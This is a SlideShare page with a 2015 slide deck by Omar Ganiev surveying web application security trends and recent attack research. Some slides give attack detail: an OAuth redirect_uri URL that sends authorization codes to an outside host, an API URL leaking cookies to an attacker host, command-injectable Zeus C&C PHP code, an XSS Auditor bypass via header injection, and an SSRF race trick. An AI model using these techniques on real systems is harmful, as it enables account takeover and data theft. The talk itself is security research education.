O slideshow foi denunciado.
Seu SlideShare está sendo baixado. ×

[2.1] Web application Security Trends - Omar Ganiev

Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Anúncio
Carregando em…3
×

Confira estes a seguir

1 de 45 Anúncio

Mais Conteúdo rRelacionado

Diapositivos para si (20)

Quem viu também gostou (10)

Anúncio

Semelhante a [2.1] Web application Security Trends - Omar Ganiev (20)

Mais recentes (20)

Anúncio

[2.1] Web application Security Trends - Omar Ganiev

  1. 1. Web application security trends Omar Ganiev 28/02/2015
  2. 2. Hi! I’m Beched, and I love hacking an solving problems. Let’s observe overall trends and some recently published papers, vulnerabilities and techniques, connected with web application security.
  3. 3. Classification Questions to classify the vulnerabilities: • Is the exploitation technique new or known? • Is the attack target new or known technology? • How large is a potential attack surface?
  4. 4. Sourcesof news • Bug trackers, mailing lists • https://blackhat.com/html/archives.html • https://blog.whitehatsec.com/top-10-web- hacking-techniques-2013/ • https://blog.whitehatsec.com/top-10-web- hacking-techniques-of-2014/ • …
  5. 5. Community opinion • 30.77% of respondents from rdot.org will go to dance a ballet, because web hacking is gonna become way too complex =)
  6. 6. Obvious remarks • Growth of security awareness of developers makes their code more secure • At the same time new products and technologies are often released without careful security audit • Old software is often considered as safe and trusty but contains severe vulnerabilities • Business logic bugs are alive
  7. 7. Obvious remarks • Infosec is part of CS and IT, and it inherits global trends • The global trend is a wide spread of various gadgets and mobile devices • The global trend is making houses and vehicles smart • The global trend is making web interfaces rich and self-contained in the browsers
  8. 8. Take a look • There’re loads of papers and presentations at BlackHat archives. If we filter those, which are connected with web security, and range the topics, we get the following scoreboard of trends: • client-side && mobile • clouds && big data && social networks • misc && classic • TLS && SSL • IoT && routers • PRNG && SSRF && etc • old soft
  9. 9. Client-side && Mobile • Known technologies, new life • There’re loads of papers on client-side security • Loads of bug bounties are given for XSS or something like that • There’re a lot of tricky techniques, and we can see a long war between browser developers and XSS hunters • Mobile browsers are also targeted. Some mobile OS interfaces are HTML5-based, which increases impact of XSS
  10. 10. Client-side && Mobile DISSECTING CSRF ATTACKS & COUNTERMEASURES JAVASCRIPT STATIC SECURITY ANALYSIS MADE EASY WITH JSPRIME MILLION BROWSER BOTNET PIXEL PERFECT TIMING ATTACKS WITH HTML5 ABUSING WEB APIS THROUGH SCRIPTED ANDROID APPLICATIONS CLICKJACKING REVISITED: A PERCEPTUAL VIEW OF UI SECURITY THE WEB IS VULNERABLE: XSS DEFENSE ON THE BATTLEFRONT CALL TO ARMS: A TALE OF THE WEAKNESSES OF CURRENT CLIENT-SIDE XSS FILTERING REFLECTED FILE DOWNLOAD - A NEW WEB ATTACK VECTOR REVISITING XSS SANITIZATION SAME ORIGIN METHOD EXECUTION (SOME) - EXPLOITING A CALLBACK FOR SAME ORIGIN POLICY BYPASS SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER - XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS TWO FACTOR FAILURE THE INNER WORKINGS OF MOBILE CROSS-PLATFORM TECHNOLOGIES JS SUICIDE: USING JAVASCRIPT SECURITY FEATURES TO KILL JS SECURITY UI REDRESSING ATTACKS ON ANDROID DEVICES REVISITED ULTIMATE DOM BASED XSS DETECTION SCANNER ON CLOUD
  11. 11. Client-side && Mobile • UXSS, MXSS • ChromeOS, FirefoxOS • Browser extensions hacking • Endless security features vs bypass war • XSS Auditor, CSP, HttpOnly, SOP, CORS • Funny things like RFD (reflected file download) • OAuth bugs
  12. 12. Example • Chrome XSS auditor breaks a lot of attacks, but in most cases it can be bypassed, or at least an attack can be modified • The idea is that it looks for complete tag names or attributes from the page in the HTTP request packets • There’re plenty of bypasses, take a look at http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor- bypass/ https://www.blackhat.com/docs/us-14/materials/us-14-Johns- Call-To-Arms-A-Tale-Of-The-Weaknesses-Of-Current-Client-Side- XSS-Filtering.pdf
  13. 13. Example • Other bypasses include CSRF tokens leakage, form target forgery, etc
  14. 14. Example • Secure CMS and XSS Auditor can be spoiled with plugins • Look at this typographic plugin for Drupal: var result = Typographus_Lite_UTF8.typo_text( $(this).text() ); $(this).after(result).remove(); • JQuery method after() is insecure. As a result, div contents become HTML-decoded, and all your reflected or stored <script> stuff becomes active
  15. 15. Example • OAuth is often vulnerable to open redirect due to lack of redirect_uri validation https://*.ru/oauth/authorize?client_id=4f81a884015911e2b24a6c626d99879 c&response_type=code&redirect_uri=http://*.ru.incsecurity.ru/&state=&sco pe=...&action=login&csrf=69a1dc0caf28d791cb1998c8dc37a257 After authorization redirects to: http://*.ru.incsecurity.ru/site/login?service=*&state=&code=ba0ba85 458d0db1c65792d52c8bef3c4407374b2 • Access token (code) value is enough for account takeover
  16. 16. Clouds && Big data && Social networks • Fairly new technologies • Cloud computing and machine learning are heavily used for different purposes • As for infosec, this can be used both for attack and defense • Social networks and big data providers can be exploited for deanonymization and fraud • Machine learning can be used for building WAF
  17. 17. Clouds && Big data && Social networks PREDICTING SUSCEPTIBILITY TO SOCIAL BOTS ON TWITTER USING ONLINE ACTIVITY AS DIGITAL FINGERPRINTS TO CREATE A BETTER SPEAR PHISHER WITH BIGDATA COMES BIG RESPONSIBILITY: PRACTICAL EXPLOITING OF MDX INJECTIONS BIG DATA FOR WEB APPLICATION SECURITY FLOATING CAR DATA FROM SMARTPHONES: WHAT GOOGLE AND WAZE KNOW ABOUT YOU AND HOW HACKERS CAN CONTROL TRAFFIC PIVOTING IN AMAZON CLOUDS BRINGING A MACHETE TO THE AMAZON BABAR-IANS AT THE GATE: DATA PROTECTION AT MASSIVE SCALE SECURE BECAUSE MATH: A DEEP-DIVE ON MACHINE LEARNING-BASED MONITORING BLENDED WEB AND DATABASE ATTACKS ON REAL-TIME, IN-MEMORY PLATFORMS HADOOP SECURITY: SEVEN WAYS TO KILL AN ELEPHANT HOW TO LEAK A 100-MILLION-NODE SOCIAL GRAPH IN JUST ONE WEEK? - A REFLECTION ON OAUTH AND API DESIGN IN ONLINE SOCIAL NETWORKS
  18. 18. Example • Post-exploitation of distributed web applications is often a bit tricky – you don’t exactly know which node will process your request • Nodes can often be enumerated via HTTP response headers or cookies • Sometimes some nodes are not updated and contain vulnerabilities • This creates mind-blowing phantom vulnerabilities =) • Take a look at cool talk about Amazon EC2 post- exploitation: https://www.blackhat.com/docs/us- 14/materials/us-14-Riancho-Pivoting-In-Amazon- Clouds.pdf
  19. 19. Example • Data providers are often used for targeted marketing. However, their data can sometimes be stolen and used for deanonymisation or fraud. This is documented API request: https://*.ru/api/id?pid=PARTNER_SHORTNAME&url=htt p://incsecurity.ru/?adv_id=$UID • $UID will be replaced with actual cookie value by the server and will be sent to attacker host • Information about user can be obtained via JSONP hijacking, even if session id is checked.
  20. 20. Example • Request: https://*.ru/api/get/?uid=$UID&success_cb=_cb_s&fail_cb=_cb_e&st =1 • Response contains information about gender, interests, etc. Part of interests description file: … { "id": "40010082", "segment": "Fetish & Bondage", "category": "Interests", "section": "Interests", "description": "“ } …
  21. 21. Misc & Classic • There’re a lot of works which continue previous researches and bug reports • They improve exploitation of classical vulnerabilities like SQL injection and testing/analysis methods • The raise of penetration testing industry pushed up demand for .NET and J2EE applications hacking methods
  22. 22. Misc & Classic ') UNION SELECT `THIS_TALK` AS ('NEW OPTIMIZATION AND OBFUSCATION TECHNIQUES’)%00 INVISIBILITY PURGE – UNMASKING THE DORMANT EVENTS OF INVISIBLE WEB CONTROLS – ADVANCED HACKING METHODS FOR ASP.NET, MONO AND RIA CONTEMPORARY AUTOMATIC PROGRAM ANALYSIS FINGERPRINTING WEB APPLICATION PLATFORMS BY VARIATIONS IN PNG IMPLEMENTATIONS I KNOW YOUR FILTERING POLICY BETTER THAN YOU DO: EXTERNAL ENUMERATION AND EXPLOITATION OF EMAIL AND WEB SECURITY SOLUTIONS WHAT GOES AROUND COMES BACK AROUND - EXPLOITING FUNDAMENTAL WEAKNESSES IN BOTNET C&C PANELS! SCALA SECURITY: EXAMINING THE PLAY AND LIFTWEB FRAMEWORKS
  23. 23. Example • The paper about hacking C&C panels reminded me of the RCE vulnerability in Zeus C&C, which I published near 2010. I opened these links now: http://ahack.ru/bugs/zeus-vulnerability- exploit.htm https://github.com/Visgean/Zeus/ • Guess what I see there since 5 years? ;)
  24. 24. Example • The name of function has changed, but vulnerability is still there, AFAICS ... function fsarcCreate($archive, $files) ... $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"'; exec($cli, $e, $r); ... foreach($_POST['files'] as $file)$list[] = $_CUR_PATH.'/'.$file; ... if(!function_exists('fsarcCreate') || ($arcfile = fsarcCreate($arcfile, $list)) === false)die('Failed to create archive, please check "system/fsarc.php" script.'); ...
  25. 25. Example • This is a small example, probably there’re more critical vulnerabilities in this popular botnet C&C. BTW, how do you find vulnerabilities in the source code? • Paper on contemporary automatic program analysis mostly tells about grep =) • Personally I use grep with lovely regular expressions: w*(include|require)(_once)?[s(]+(?!s*('[^']*'|"[^"]*"| )[@s.]*(urlencode|rand|rawurlencode|basename|le venshtein|doubleval|sizeof|base64_encode|strlen|flo or|crypt|strrpos|filter_input|abs|bin2hex|bindec|has h|intval|max|decbin|strpos|crc32|ord|md5|count|sh a1|min|pathinfo|floatval|round|hexdec)s*()[^;]*$. *
  26. 26. Example
  27. 27. Example • 2014 has gone, and here comes 2015, but PHP and Apache are still broken • Several UAF vulnerabilities in PHP fixed recently, still a lot of restriction bypasses and RCE vulnerabilities live deep there • Apache has not yet learnt RFC • Other popular miscellaneous words among hackers: NoSQL, SSJS, SCADA, SAP
  28. 28. TLS && SSL • As old as the world • There’re still a lot of misconfiguration issues with HTTPS • Also there’re a lot of scary words like BEAST, CRIME, BREACH, HeartBleed, POODLE, SSLStrip and others • Many configuration mistakes are result of trade-off between performance and security
  29. 29. TLS && SSL SSL, GONE IN 30 SECONDS - A BREACH BEYOND CRIME TLS 'SECRETS' TRUNCATING TLS CONNECTIONS TO VIOLATE BELIEFS IN WEB APPLICATIONS A PERFECT CRIME? ONLY TIME WILL TELL THE BEAST WINS AGAIN: WHY TLS KEEPS FAILING TO PROTECT HTTP BYPASSING HTTP STRICT TRANSPORT SECURITY
  30. 30. IoT && Routers • This is one of the most popular new IT trends everyone heard about • New means untested. Untested means vulnerable • Seriously, the Internet of things is broken, and many yell about it • People hack RF protocols of alarms, people find smart houses without doors via Shodan, etc, etc
  31. 31. IoT && Routers EXPLOITING NETWORK SURVEILLANCE CAMERAS LIKE A HOLLYWOOD HACKER HOME INVASION V2.0 - ATTACKING NETWORK- CONTROLLED HARDWARE A SURVEY OF REMOTE AUTOMOTIVE ATTACK SURFACES ABUSING THE INTERNET OF THINGS: BLACKOUTS, FREAKOUTS, AND STAKEOUTS OWNING A BUILDING: EXPLOITING ACCESS CONTROL AND FACILITY MANAGEMENT SYSTEMS
  32. 32. Example • Just look at this:
  33. 33. Example • And this:
  34. 34. Example • And this (admin;admin):
  35. 35. Example • BTW, side note: why doesn’t XSS Auditor perform HTTP response splitting check? • As you could see on the screenshot above, response splitting kills XSS Auditor, because we can inject header X-XSS-Protection: 0.
  36. 36. PRNG && SSRF && etc • XXE, SSRF and randomness hacking were hot topics of 2012-2013 • They are popular today too, new applications and attack vectors are developed
  37. 37. PRNG && SSRF && etc BLACK-BOX ASSESSMENT OF PSEUDORANDOM ALGORITHMS XML OUT-OF-BAND DATA RETRIEVAL THE NEW PAGE OF INJECTIONS BOOK: MEMCACHED INJECTIONS ICSCORSAIR: HOW I WILL PWN YOUR ERP THROUGH 4-20 MA CURRENT LOOP
  38. 38. Example • Autodiscover interface in OWA reveals an internal IP address of the mail server • Ev.owa interface with cPfdDC parameter can be used to send some LDAP requests and connect to different hosts (“domain controllers”) Microsoft.Exchange.Data.Directory.SuitabilityVerifie r.CreateConnectionAndBind(String fqdn, Int32 portNumber, NetworkCredential credential) • If there was bypass for anti-CSRF canary, you could possibly steal NTLM credentials
  39. 39. Example • vBulletin forum CMS allows to upload attachments from remote URL (class_upload.php, class_vurl.php) • First it checks the file size via HEAD request, then it downloads the file • You can use HTTP multiplexor to exploit race condition and return code 200 and valid file size for the first request and 302 redirect for the second request • Some configuration options and old versions of cURL allow file:// URL wrapper in Location header
  40. 40. Old soft • We’ve witnessed several critical vulnerabilities in well-known and widely used software in 2014 • HeartBleed, GHOST, ShellShock, POODLE, goto fail, etc • Probably it’s an important moment, when we stop trusting and begin reviewing all the fundamental old software that we use everywhere
  41. 41. Old soft EPIDEMIOLOGY OF SOFTWARE VULNERABILITIES: A STUDY OF ATTACK SURFACE SPREAD SSL VALIDATION CHECKING VS. GO(ING) TO FAIL
  42. 42. Example • Although these famous vulnerabilities are not caused by web applications, they deeply affect them • ShellShock and GHOST affect webapp<->OS interaction layer • HeartBleed, goto fail, POODLE, affect mainly webapp<->encryption<->network interaction layer
  43. 43. Example • This is another proof of why shouldn’t we consider any part of the software as trusted. Each component of the system can be broken • BTW, newspapermen also started the era of nicknames for vulnerabilities • I find this a bit ridiculous but funny =)
  44. 44. Summary • The Internet is broken • The WWW is broken • Hackers gonna hack • Web applications become smarter • Hacking becomes smarter
  45. 45. Questions? beched@incsecurity.ru

×